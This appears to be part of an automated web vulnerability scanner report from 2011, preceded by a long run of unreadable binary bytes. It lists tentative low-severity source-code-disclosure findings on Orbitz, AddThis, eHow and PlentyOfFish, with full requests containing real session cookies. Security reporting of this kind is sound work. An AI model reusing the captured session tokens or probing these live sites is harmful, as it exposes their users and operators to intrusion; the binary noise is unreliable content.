*M`^.......9e.~.f.\...K".K...d.....i.R..X...Y\gt....\%...TJr)c85U.}O8.C~b...}.... s...po.C.#..s...&...\....0.....kBb...9...[....+..............w2...U..Y.*Po.......8......8.Y....9Kr...;...!.>*]&..#...Py.zD....^.aWI........U...r.;G|.F."
...M.Z..}....[....9...
.....#C.<..I[TV..x...!..5.p..4..........=.k8..bk.m...z.x3..'l...*.7T.k...z..VGr>.......yEF...........J..4..n$V..\v..}.iM.......]9......k...RR..........G.%]..J]G.L.<QL/-e...<f......(.6.x<g...3.U6....N+....%...V.....T.........f|..{EK9....-h2../........./.F4....=...Pj'..~K.*...I.(C.Q.$@......,.J...k..M.._%J.$....uSg.i..5.....^....*....u.....f._''.8..........7..g..$s......Q..N........%......1.\..r.......$........k...G...v.WV...@...b..p.M...g1..mw...I..b...|.V^...=B.)..8?...D...
d(.:G..d.... ..A..}X...(.qzT.k...........6....t.ws..Gg&..    xi..-....0.`......1....S.os.X.<....W?h.8.{.og.. ..cX.l.9`..].Gb...!>...+...=."d.W....E[.....c.I...=_.p.k.rC..D...T3....*2.[...f..kf*.u.[.~k._.R:....1Ca..."k..+.i... .|......wo.{.uJ...;_...a>u!..C.'Qk.f5'....k.2......? l(..*... <%....z.....l.n........#.....Q..h9..]K`j`y..{.2...PA.....    ....K...6@..l.Cj0...]    F.&.A........b..1.]..e.XH6o'..3..._T:.Q.T..V.y.....?..fp.%.A..h3..].>.......kD..J.D[}J.....[....s..d..".....*.F..."3..7..5............vxsU.. .9'..Q.".I.'H.|...cU.Q...b....U|.=..i...M...j.?....|..8.
<J6.........x.3......s..H..V~.|..D...U........oQ..F..qI&.....(%}RK+..[.....!....(rsR3.U#U#U#U".....a    ..O.......$..@......CG..g.....-H.H.k.d../.~o....4....O.._.X.-....gG..{.&........;}.$.{.Iw...H.o..D9.....
..e`..........."~..v.....?.D.h...>..J:....L.]..$..(..~_,......"..?...:.....-/.q;.g5.....k....6)a>..........Ji.....K....
.E.?.|....h..."....RGgf...8...v?...~G.}...P.....=...........f...!rX....f...T.. .[.+.S..f..0.8N`w....3..-S    '.Ep...Z.../.o./0kRo7..x7..b"o.b...:Q._a.8O?...7..2.SSt+...w.x..l...    ".._.&.^...qI.....{t..>5Rb.?.#fj3L....n.A..K]..v).WT)9..}.^E.(..nd_.=3r...?.2.b|...`}.k..[,....(..?....a..........f%...n..9....<..xc...&.F....3..g....R.!.U..f[.......................g.i...%.gJ+.(hUW..6.........}..|......b.R........{s..G..m\
XNc_R..Y."t..fA.'P1kI......1.u.E/...cg.....3..b...DV...T..N4...um.|y.W.....8...b.D..t....E.l...."..."..N4..Sh.Xc$c.V.q;A.........#...............N..S....4.....(#..K.8.01..*.~H.^.<.........a.uV...1.{Jc......>}..]....Fq1.x$..T.P_.../.`.5.;..y    ......G!..b.j..@...q_..........5.B'...?o...*g"....7.....".g..k1.E...\P.....!...N.8\...w.f......G}nh..g|.....O>.0e....u..5...X..3H..~.b.{.g.Jl.4....B.n.\r......
..k+.B..f8..U.&.........h8..h....^....X............'^,^.y...
.?.6..m...o..vu..|.].9))".KgoU.f.....{^.....Y....6;g!.....7_...A
..}...5...\.m...C2.O......*.....'....?J_d.Z..5...#F..Z....._D...'.3.....J....pxJ.Q.{|~.fl...l.5\i.....*`LX>....H%q...`.m...7L.~.Y....7@R,....&....    .(7.^..L.D,h:.%.ER.6........$..)A.j.Gm.
...!.nn<..s../..".".)...fZE....ju.5....+w......u.*...iO5.Oxa...&..+y.@.4n.._.....1\.......d.Q6.T?..!_ .7.t..9zq.y..1...=v"....!^.............q...L.Y.CcPB..8.c......\>.nI@TO...z..DXt..:...{v.....F....p.:.}..W.jXn.S..t.B.J4q............5UJ./...%A....F.F.F.F......Z    ..4.......$..@..il.I9#..^N..:F.F.....    ..g....    ...].g...C...kj..]..W.?...N.1..........v.i..h1..i.R.:xh.U..~u..qm../..(..h$!...^....8.Es.V.mA....?.>.[...S...H...X.bO..........X...N..&G..zw...;.:....aH9.m...}...Zx    ...Z..."....J~.E.v.6.A$...... ....V]...((..Vf.R....F.McTR....[..9!....*s!.........7M....}n^...+xk>..d@.<.d....OG.C`.......QX.`............Yh.....b.. ..O..CH....N./2....<.b..:EN..e=.%..b....[JS.k al=.9H^.0o.(6....;.=A...B..Ib.....yb.z..N].l{.."'aV.`....,..E..2I_..F.il@b..Ql..6n....?..?..C.'l|.>L>...........#.J/t.`/..5K..>i..    ..Q..&.4..4J...V1.../p...Te..@^..%..Wbd.LM,.r.."..(....Uf.do...CTV......L..2w....|.h.f^p.k}...e]...K..,.B4<.BV.....0.R
{7..6~a/..M*.Ht.V.......@.....AV.i^.s#...W{.|...&......gk.C.....[Nc)..|N..../.\...Od.D.......BD..._U5....W........r.....Q|m.!..xW0....$.l..$.....ND'..1..a........o.x~.......6V....S}...Il.B..........l.D....*!...M[6.Q..8..G....G...T.. .T/.)..C25x....v:uA......e....J.E+
R~<.2../.......Z.K..w4.Zu.N.... U..2s..2.....j.........Y..w......k..Hw..!.k.b.".l..    .:LU.....C....h.......y.S..>dc.".Ia<
..YZ.@N".,..b;hq..<O.... ...$,.s.!wg{....Z....g..D.FW..f.9..... ....rR.u...1.r.sZ.4V.'.m.k...u...!.].cu.^|../..6K=#..=..o......E.SoG...{"6.U.S......dI
o. t...A`..`W..=...i-`.}..b....@..b.I=.v.G.`..l..W.&.i...s...&..LF.R...u^.
-L..`.x......wz.....Yl.... ...k...;u...x_....q[.W.E........y.w...x.P.N.X. YoW.Cv..y.q^.5]Iv.z.l/...vf...."..vx....x....qy.... ~..I.R....9...~..mP>M..a...eu............_a).!.U........o.{<..$!..    .j...    .PE,...<.B.z.b...*....5..6...D..[w..$E.J....`..`9..0.i...7.3...o...    i.D..u*.    (.O\......{~E......!......Z..8..T.T.T......?    ..k..(....$..@........*I..,5R5Sg....J4%.:(N    ..V.o.......Z.......G........$1.....2......q?.#l...<.4.)Xa..........?`.d......L...x....r.......?.h.Pl..s.
."..ili$Y.|#e ....H    ..l..\.#.~T...#W..$.:.......4.In.}..v.)..Gw.V.i. ..*$.ZW.g..o~*.j8..xF...).=n.)w...G..LTAh.DkWH..v.98S...`..0k.M...i......\L.+...-c.M[&&H......cF_.E3#..E.w.{.U.-.E.#U.E.....@...0.8K.U!m.qV.'..).K.....1..W+.@..HfW+U1(>.E9.. 5.>...j.c)............#.ZN.<.4q.|..&....%2...."....%.+....o...LI.F...dL.W....h..$.D.y.k2(.8..    !m...Rga...j..|..4...sj.fY.sT...[u..E,...D.....@zB.26+0.....y..........N.8...8.4......`...`..    I L.....S.q...I@..'..)@.R....1.    :...8...........T.9m\.w....|....5.A.{...7.
b.l.[.M.c..C.'.S...%.n...    .ah..]u....`.....xB...
|.....x.w..v)...*.....$...d.b....[..tn..N6...-....
=..a.I..d."....x.,....>.j.s^h......Y.Y..q.
..|V........u.-..l.2...!.pI.....5.A    .m|!%.O.w.L.......&n..gl....".X..E.sz[.r..:.x.<.......N....P..?... )...XBj.....kA....'4f.c...c3..F7e.....z.C..H.y.........D.Yh.....K..3.p...$f..e.$=.1....&...$..:....q.C...\qL......C...Oc..7).ItD&Y].......z.....^S.L....P..).]...3.\.(.3c.....w.hN...@.._.! >...+..I.ku../\.........\..(.F.F..2.%j".`...M\.2c;.qVdz....Ph...*E.G.(~.n*.i.c........j....mz..?_.Oi.b:..T...v.rT>..~...$ L.P;..c[....L(j.nz..=w{k.
.\}..'..!%..4..m.:........b.s...`.f.a......... ..l.....9.P....{7..    5&t}z.X.*G....A`......
....9."n..O.....4...Z...^E....9....0Y...te.....g.0[.c.7.@%....jE.....sq..i....t. ....U.V..(
3%$3.`nJ..3...;..\p.S...*+.f..n.~Ky...'B<...1.CJPg].]    >...... .Ef....C......".C.=9=.2#....yK}.:....\..K7..N......q..m.=.[..|........n.?....QruU.....3....;....ft..-.?va-0.....PA%.....<UT..o..<..R7.14t.<..U#'..............v    ..D..J....$..@....LB.s qm... .r...!z..J+B.K..&.S)dx....|..<hg/b..U...fM....,..`.O'.D{.b..E.H.H....2`...k.....(.5G...m.I...8....>.*z..D....6...........rG,.ff..?z...... ......(..Z\.k.....q.R.....r....&..kX......3..F.....T.m~...F.X..3..EBx^\...p@..iH..Iq.W.&I.yj.%.o .(;...K6.-..F.(9~..n...E.......pq.Q.....\T...v..N.H...{]..n....~..;KJ8....J.w.,...W..x.......w......J.?.+htbHw.x1.tjw....Y..%.5.......+.O.Ii..I..C3%...!..h......N...].-Tj.N..(....`y..-5.F..5......Ai...N....H...P....1...0...cJ.*O.s.p4...e..Z.]!yk.2..t:..[..}.N.    m*.AI..X.e._S.AA....\....J(u].d'.@$<P0..Q..4/U...F.y.m.1..K9s..U6BzJ..5Hx..........I.8Ct...}9.!............D..]..0CO3w.l......9R....M.......".f.s.E.[......uX.6D.]..Z.C.an...>.%...3p...U    .m.0'!....T..A..}.....}.tA.#.    .c
.+.........?ix.....BY...j.K.e....8........#.w.[..A...6.K.........|...k..O.>@...g..u..p..=..K..G......R..0h$.....<..l.%...c...e~...")..eD.A....o$9?.yJ.Y..m.F..n.C.5g..".4;...8.<.X.i/hg.RMf...).. ...tDK.B..uP.....1...^...wx.....*].ED..Y-.;,HK-b....>~.o...d.K.......3C&......G.}WV.bD...Q.DPG1...P}.r..9[.....<u........p....}..H.0]tU.'i.*........`....F.m3M...A...    jjP.;R.%....l4..\.D....K..F..!sS.3....a..O..u..%.*.....A..1.c    ...........5,psc^/.......f\....X.....A..bi.2.BJF...O...o.....;m.\.|....3J8.O.]p^@..Y..b../..v.=...<o....F^..Q...T.)..W....."#J.....(.....`.4..c.......[...5.-...o.b.u....N.......V......@.....7m........&.[.a.rm26w..hfr.ba..'.....ru.....\...>....!.C.6..+y.@.4n.._..!:=..d3......c]......h.o.R.s.T...FC.5......a..g..[...FD.....`tZ.dmn7.8........3b..d........D...hv....(....Z.d*..Um.tH......$......$....*.h....5\=.+e.1.j..._2/"J.5Q.T.T.T.T.,....O    ..O..k....$..@...^AS......?? ..    P..F.IOh.....U.H.,t+k.p.>fD........,Vqj.3F....g.VT.......cs._bgt@K...s.{u.iMC..8...E.'.........B..w....t......8:....Y).bv"....X...TG,......1......[P..5..4Za.:(g.J...A{...R..H..k...iMf.?N..p..s..@......@iW........ZHP.....:.(........$...d
wp..R\...C..r..Nw.../..aB.$Yy#~`E#....3M....{c.y...o...X`rAJ...|..[...8..na.B.V.    ............z..^WfU...b=..i..v...f![%]..z\L{.5.....7.@N.....+.9u:.....U.i.f...[:Z+.y......f.X....$...\.../....\.W.|._...*..%.....e.......PF.e.....s ...-'....`G.y.rj..^....8~......~.h..cj..x...6....E.8...{.!..s.l..u?.5u?5.Dm|C..2......tgs<.....>0.|..^.!.....XGq..............R..w2.,....}..ac.i..j>..M....[W...y....0.l.[=#{
..'.@k.K1..>>..90..1.x..^...CK......N.D,...X:.#/.y..6.....K.&.8..,fVY.I.VoG.c...\....Ra..O>........,.q..2.....].2.._p......x......$..:.............SwP...Uv@....B...}.*,.........J...#.|V9...........^..."Wm.Hz.AT2M...$.C....TzJt.$..W..#.,~.........l.b..u!R)..;'Eco.....Pz..A1...._...*N0=...<...S.,.r?.....{.....I...B.Fv.....A\.6..QT..=..~..........\..Q...u.a....{...fs...P....r1B.4....V........|...[\zc.E..:./%..$..S..O...69...y.97..t..... ...8.A..1m[...|...g.?}.,.._...].w..B.)....5'....k.-......]8F.......<.R
]...&i...4../v.%....L...{.px..n....K.....1w..6.....\'x.).,..%...y.z$....G...:..K...J.M.k.....>.^..._T...K...;i....9."n..O......._.-.n....J.R....F..?..v..K3..H...So.MBH..A..F......sq..i..&.....!. ....h..nR.-..C.....sV...k....P..H.dY.D...3....e.....h.+.......R}.#........... >.q..o..Z.'......;.*..#.#....Ul'.Z..G....hM.........[g.....>....&o...)...........6W..k....U..#R......R.w.j....R..Q..0G..p.........Vi|...*..F.R5R5R5R4.....Z    ..........$..@H.s..0k..X....u.9T.T....>f....#.o;*c.......jhk.`......r...7Aq...*D...{..V.c|.%....U.`y..@.H...E._a.CB.j.}.....|....G.....p..1^...sC......d.......@.q-.....pS............^D..S..t...O.B...|HX.S<j4i\....X9.w#hh.yW..R......t..+q.....-A..-.C..Im/Y.....aS.......F..TnPH...:.?b...........q2MOvli0..<z.n1....."..Y.0.Z..[....=.HJxi.P.s./.q^.d_/.....H...R.....i...;.kv...L........(+.....KA4
I=O.`O..5.I.._......u........r.B....[o.]mR.^3.....{Q.o........$..4.NlY.6..w>......i.H. ..5. 2......<.q....Mh......Y...0......(.5....A.v.naVh.^/....p..........znH.Fk..v.t.h..*k.9.._..E/..iC.l.Y.E.%..)......3.<L..]..l.i....o+.........Tp.B..I.x..Z..w.A.....Cu.U...(....|.A..i...g..;.@n..c.kp5.6a.j..7.8....J.sGsvm.....4...j.v..3...8...4.a..H:.7....a....E.{.nnKA.M..LT.v..D.    .u..0t..,e..u..@1d.,p..|........c...P.'a.....".*..0.:Z..WA."...X..l.....w....^.?...l .d ..n1....u.mB|.P.20..#..,.\...fk...Jb...].!...'.W.A....LJ.3|A.J@.1.s..b.8P5.>)...xb.]......<.p1.Ta.o.C.v.=.NB...B...>.....G=.....~/.
>.d. ..4...{l..$.b..9oW\...1.c.Z..9*.w..._N<......)..>......|)08n..A..........m_i!..]..h..R.v!`.6.2...e..g..).{'...v...b.    .....sq......./........]....
.Z....../.J.....Y .%..C6.0.";.+.9 .-...t&@..4.iqJ.Nf?.    .d.C..}.......}=fz;..qr.;...O...^...........l.}
...gB.e....m...}8.}..x.J....a.#.......%.4~..=...$.u.*...P4.+.<.*..:.X.1...6.+...L89.E...<.IN....f......`-.o.....>.._.....#o...~k.?P..;...6%..m.81|\Y..U"...zF..J...F...3...`...N.<..+o...!.nn<....D@.....r.W-}T...v.t....G).N] 6=.EuD..S.......Vg.z..w......K&&.e5n.~Ky...%..93...... ..Wk...<........1....^...2Wb..tQ..G..f.(.. Y......U.^*...#.....C.HQO..,...!0.B.....\>.nI@TO...z..DXt..:...{v.....F....p.:......0...MR.R. ..T..P.*.HG..X.@M.....:X.~e....H.H.H.H.......    ..?.......$..@..........K...F.F..... .[.-.    (`m..X,0..S.....LcW.k-).....N.\..2'[ZZ..t..Rt..R.....nP....
.....8....Bu(.J..Pu...Nx.....8.tsi-.."..E.=.....e_...,..........~2%..i.q..f.?tL.....T...=..t.k...i.....>P#9...w.]...N....6._.^...r>.R?.......D&.."....A.....HQ.A!...    ..+.u..<..F{~.e-"....U%.....:..7..tQ7j......r...=...j,..7\!.9F2#Gwn.bI....w..f....5..TG...2bD........[t..C..;..f.k.k.N.I.YI.._s5.Mq....4.1.L............'J...................f......|...S...:.....WW.dx...ui..s...(%.....~{p,..9..A.v....%..2.......K..A....>&y<.....
.....'.....Ao.#.;Po%.W....6..6>@Y.8..$1.._!..z....b.X.....c`8.:...m.c.
...}o|.,C..D/
...{a...&..o...d.*~D.r..nY....t..8.!..p(n$I...O@.B|...+.o.^D.... ....".+la.Z..V....@....(..t@    .v....;.*I..'.FK...!...(.T..7........':G.x.b
...q.....Ja+...#...7a........HJ....{..=V`.N..s;......~.@...E.....C...........r...{.2..8M.\..t....N...)....~........5.......V..+..i.j...#2\.w.[...,...a..k.d*G...T...f...:b.....{...y.Y.'..<..y...X5.)v...V<.[...3*...Qy..V.....
.m.E)J...r. .,...tw.....d.{.....&....fY...J...c...X.>.~)}.....q..4.|jp.....H..!V.Q....L9i........Uk..;9..>9'rb?.s..D.lW.....~...F...r......:.r...e.l(.9&4..W..1...J.MlP....7.........IA.!.H.."..NLU..$..I......D?..F?....    ...`*g..2...A...A..J.k6.....l.S...Z.^.<T.P..._.....k..T3...g
....rm2vY.b8./C....1.{.H.6......q."O.g.......?o[c
.d....g..Pv...&..l    ?~8....Z...P...4....8'.e.. .YJ......o%....v{.:4H.......e...D../.8....J0.k.]..x".p~....D.    ..<-t.G...@..'..Jrv.;........)m......V...o~..}...o.Kb<....?...yK}.:....\.@...Bl....g.v.z.=...lQ.....3}...H.@>-.....%....._L.S....n....x?.......T...:..R..a.?.....l..4.UR.K.E.IPF.7*.............J    ..[.......$..@].~......h.T
..sU#U/qf6Z.W.(..q..c..I......0 .....V/...=..D...........t....+U...=..H..e0......@.Q.Q.....Y.*.h.1.....H......g..`.....Yk.....
j...J.".&.......),..).....^..msvyql
m.4. rI1.#.B.e.'...............EW.w..%.^...%.d6..d..b....7....W.(.....%.....l..W.Y..5.,..
>..0................m.WG.f..D....T.:....j.........}.._.....m.Jig.j.+.....i^..!.jF....z4..;Y.........$Ye|-........w..,....7    .A~..
_C.....)|.m.|.r?.....Gz..k.o$....%.j4c....+...%...6K....).B.V...Cr...i.].$."9'.G/...o.M?...S...........I.wpZ.fH;.Wu.8..=.ns.......7...*g.t..._E;....`..*-...E...u.=MV6-....v...y..O[...U"O..X......W...|...oa._.V|V....-.D4..0.y.[..nV./..s....6.XF|.y5..r7.mf..nM.O...    ./-../.+P>.S....x.*]f..LBR.......Io..J.....+......O.8..'.0MuVmf.2.......pq...p...y........y..I*.....    .w.
(..F>.......~:....\..E.......z.....a.u!).;6....s..)dY.....9.........[.\...z..h...mh.K4....dB...l..o.@...z...i..h..OY.b.B.]Es8..S..<..;..e2Z.".......&GU.R./.q,..H$....U.dW....u.......J...e%0......U.......Fp...A.h%.|hw.......<.Pt.....g.......s7K...N.....a@%.....p..<...U'....{n......b...<......b.Y...@2...,K.BB.O..1J.........M......oW.....-C.....5...nG^1.F............+?|......./`9...Y.c..j.+.&
i^..;..7..s.1M....c8.~K.:..d.....l'.(.R).D......M.#Zz.=....$..|{.D...m.g...6..IN$Sj.....rF..n...6.*%`."....Xb6..% [............8::d...3b......|...P\......wo.Y^...........@.A"..dN.....X..[.\y.sq....;.m(........1.<..)....
.......1.......5. s.jX?...^F.|...A...m...v.W.h../....&..MQ..Q........d_.$.....mr&D...2.Y.{..,.jU.ED*./4x.7$.$./c+.e...Bu....4`!.1x.......Y..sF....S.H....'UP..n.s?^`(... n.g@...3.f.....\.U..Q...J..UI......    .#zC.GK....R2q.............f    ..F.......$..@..).1P..p..O..-H.H.r\.w88'...@M 1G.....YG|... ..l)*..[..79.&,d..6..9R,......PA...[.}..O....    ....?B...'.6.....q..|+.L.6..5.D....,.0...NT.c..K1..G..=;."........,'.j.]...JCE.i.....;....."...,k.p...N......9...&..v%.Y0....Z....;. .....L.e..rH...Vd>.2...t.rt...-..\.57....W.&I.X.!....0&.[>.#.A^.N.!..w...A...    6".....:.    0.%..qy..!4F_z..i..T.?.Y......3......ga    K8c..$ %{...BY..x#w..1...ZX..f.".p...|.X..T...M@n......V=.(...Ef.I>...r.34....A!..K/.....S..}..".%q...n%.....&.2...NA...........8.W .......L....}...3f..*...4j.xM......$
p....^...........7.......uw....i~.].\.....f. #."..%5...H.X..m..*}.p.........1...t.....-.....(........F.vm.1r. _.......,..9.{..X..
...........)......GF.g.574..'..QeV.]k...,l#.......l.'.D....f.j.-L32?'I..:..".R.].j#....%/...].T...;.5....#m....-R2IT........4_..VC...d.....L...tb...a...dsz.....    .s-....$...T......f|.w.........v./.WV..9*X..|H...'....X......yC..}M.\vGr....v%..Fc.....E..P4..........r....B.82"4a>+...h;..7......`.!....r..t0~......S..?.M.^^#...c...d..u_..1DI`...x{.....%..q...F.Y./Q.Xx.ES............+.QhR|..?E;..~/'..D\.K..m..K..s.^.K.m*.I......C...DG...c^.@.xO......U,....P.&.....t.:.........}~` ?..l.J...]D..vh.QL..F...))........=.wW#{u..V..q..5S..X......    .R    n.I.ii.F.&'.7.+..cWv.O.....q.......ev...ri.S8;v$X.....E7.HG7...y.+.....C........    |...1......I`.Pcg.b.......v.b..>.2t:/&..>.
.8.7.N$..`..W.k .....%.|!u...[...x.Gy..!..c.}..p..7X.<...}.w..'.......
}j....TxZ.....r..d.}.....|.>.... !.$L..8k7...$..g^R.u..U'........*..9.#.#....Um'.k3....L.Y.CcPB..8.c......\>.nI@TO...z..DXt..:...{v.....F....p.:.}..W.jXn.S..t.B.J4q............5UJ./...%A....F.F.F.F......Q    .3^.........xF.#.#?..O.y.5...........<.}.bu..F.kB.K..X...........(......D.Ns..C.......w...U..2.2...}...or>........=.o.N.J.S.....y3.....?.ufIt.V|...c~/.K7P...>.z#.    ......%...._........t}.."2....................X....".....X.6..C]4N.....|..a...M,.......m.....K..H.....    ...!_..c.H.:.P...f..EF/5.y.%......0R.]..X....$N....n..m.<..y.....5<.
.'...C...D.s.A._~.&....`....Q..=...,.?x.F...4A.yk2.....D.E*.....j...._..8    ....~I4.. d..[O8.|..c..N.G......a.S.(`nH-..&,.~j.Pl.I.[.]jf..Kv.1m ~.....Q...kg..<=.Y..........."#.lg..^..%...6..f..(.NX'.......uku.?.o...S..Rp.r&..K.R.......E.u>..k.F..1Hu+...z.I#..7{...0]....*}Hu.....5I.C...S..|...i..w.#..=.F[\.K......,..mz-..._.D<U.=v..    ..G.||...$..hz....X&......JyHP...!.Y....W.......D.h.U!.t..............F.f./}V...~2..d5.F..... &.C.1E2.......@.])Z..\>~..(N.u.._:...1^.s}8.}h.X.h.Z.......YY........^#[|..%uti..,....UO,w0N...\.*..\t\..Y...UaBB.F.............(.O.......<..tJr.....6PfV.np.G.S..n..6..4..........!..>8.....b.....lk+u.C.L......L9.7,BC1........s.X..d..{...G<TGm.a.U........0a5]...f........Y...5.v)i$.'.C..O...lt_Y.&..piT..i..)......g..s(....Hm1....../..%N.Ff..?Y.-.#...%.x H.........}+[.O....yJ1l.\2...6....LGM..1.][.?...d..C.......xQS.e.<......O.T..F.n..|.@....z....Z.....L0z.Vr._`...bc.X~U7.].<.....@>.b...S#@.q...N.*.....    q..........(}t.Q../2G...`5q1.......C..t    .M..(CJ..../.-,.h..;U._.-....PtT...........g;.1;2.@Z...].....H.9h..........;CJ.).....~&<.=...g.l&f........|.....N......Z..F|%....^..g..    ._VHq....u~b7.7.n..%V..F..t....*..w'..."..Y.... x....+6mt......4....... _.............o........!"4........e@b...P.....>..R..t.....N.KC.\..v....}c....cg}..c.)7........./:.mW....q../%F..F....Lv-(.....I.......~z......1[.....F....~.....FH..V.XCQ.U....5..a1.`..>f..L.....Q.z."..Y..K.J..O...6$.Q...<.M.3.....{...uE&e.......?..*.\y...&......Hp.4..er...'...w.....`..T.Y.....
?>r..jF....Zu..iF+e....#.6Y\..]..'.v.<.....!....../...#..n.S.>
...[SNIP]...

14.8. http://updates.orbitz.com/pos/ocom/coBrand/msn/orbitzmsn.css previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://updates.orbitz.com
Path:	/pos/ocom/coBrand/msn/orbitzmsn.css

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /pos/ocom/coBrand/msn/orbitzmsn.css HTTP/1.1
Host: updates.orbitz.com
Proxy-Connection: keep-alive
Referer: http://updates.orbitz.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; __utma=44634720.408317529.1296221482.1296221482.1296342268.2; __utmz=44634720.1296342268.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/42|utmcmd=referral; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; traveler_update_visitor=B8AE8BD37C84AE1; traveler_update_session=BAh7CToOcmV0dXJuX3RvIgYvOhFsYXN0X3JlcXVlc3RABjoQbGFzdF92aWV3%250AZWRABiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--1848cb98c769e595ff92d0c71ba7b529ea2e7b8c

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.35
Date: Wed, 02 Feb 2011 15:46:04 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 11271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
<a class="link" rel="nofollow" href="<%= signin_link %>">
...[SNIP]...
<a rel="nofollow" href="<%= registration_link %>">
...[SNIP]...
<a class="link" rel="nofollow" href="<%= signout_link %>">
...[SNIP]...
<a rel="nofollow" class="link" href="<%= home_url %>">
...[SNIP]...
<a rel="nofollow" href="<%= home_url %>">
...[SNIP]...

14.9. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.10. http://www.ehow.com/about_us/about_us.aspx previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.ehow.com
Path:	/about_us/about_us.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

Response

14.11. http://www.orbitz.com/shared/js/global.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.orbitz.com
Path:	/shared/js/global.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "ae75-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 44661
Server: Apache
Date: Tue, 01 Feb 2011 15:22:35 GMT
Age: 9023
Connection: keep-alive
Cache-Control: private
Content-Length: 44661

// ******************* CLIENT_SIDE SNIFFER CODE *******************
//    stylesheet selection removed - used for some DHTML stuff that is not on every page, but is on
//    enough to justify being in glob
...[SNIP]...
   if (inputs[i].type == "checkbox" && (!inputs[i].disabled) ) {
           inputs[i].checked = checkedStatus;
       }
   }
}

/*************added for group selection support throughout the TP site ***************/
//<%-- enable/disble assign groups controls. Same code is used on addEditEditExceptionCodes.jsp possibly could be refactor into one include --%>
function toggleListSelects(interactiveState)
{
   if (interactiveState == "off")
   {
       disableLinks();
       document.getElementById('assignedGroupsList').disabled = true;
       document.getElementById('unassign
...[SNIP]...
ementById('removeLink').style.color = "";
       document.getElementById('assignedGroupsListLabel').style.color = "#000";
       document.getElementById('unassignedGroupsListLabel').style.color = "#000";
   }
}
//<%-- attach move functions --%>
function enableLinks()
{
   if(document.getElementById('addLink')) {
       document.getElementById('addLink').onclick = enableAddLink;
       document.getElementById('removeLink').onclick = enableRemoveLink;
   }
}
//<%-- remove move functions --%>
function disableLinks()
{
   if(document.getElementById('addLink')) {
       document.getElementById('addLink').onclick = noClick;
       document.getElementById('removeLink').onclick = noClick;
   }
}
function noClick() {} // <%-- empty function to disable links --%>
function enableAddLink() //<%-- add function --%>
{
   moveLists('unassignedGroupsList','assignedGroupsList');
}
function enableRemoveLink() //<%-- remove function --%>
{
   moveLists('assignedGroupsList','unassignedGroupsList');
}
function enableMoveLists()
{
   submitActions('assignedGroupsList','assignedGroups');
}

function toggleAnswersList(interactiveState){

   var
...[SNIP]...

14.12. http://www.plentyoffish.com/helperb.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.plentyoffish.com
Path:	/helperb.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /helperb.js HTTP/1.1
Host: www.plentyoffish.com
Proxy-Connection: keep-alive
Referer: http://www.plentyoffish.com/inbox.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw; ft=Monday, January 31, 2011 5:25:37 PM; my_ipcountry=1; __utmx=9489908.00012890560422417014:1:0-1-1-0; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296527588.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __utma=9489908.1831818404.1296523584.1296523584.1296527588.2; __utmc=9489908; __utmb=9489908.1.10.1296527588

Response

HTTP/1.1 200 OK
Content-Length: 6924
Content-Type: application/x-javascript
Last-Modified: Wed, 07 Apr 2010 23:03:13 GMT
Accept-Ranges: bytes
ETag: "ba123c80a6d6ca1:932"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 02:34:22 GMT

...function createRequestObject() {
var ro;
var browser = navigator.appName;
var version = navigator.appVersion;
if (browser == "Microsoft Internet Explorer") {
ro = new A
...[SNIP]...
ent.getElementById("country1")
if (country_id) {
country_id = document.getElementById("country1").value;
}
else {
country_id = "<%=country_id%>";
}
}
var zipcode = target.value;
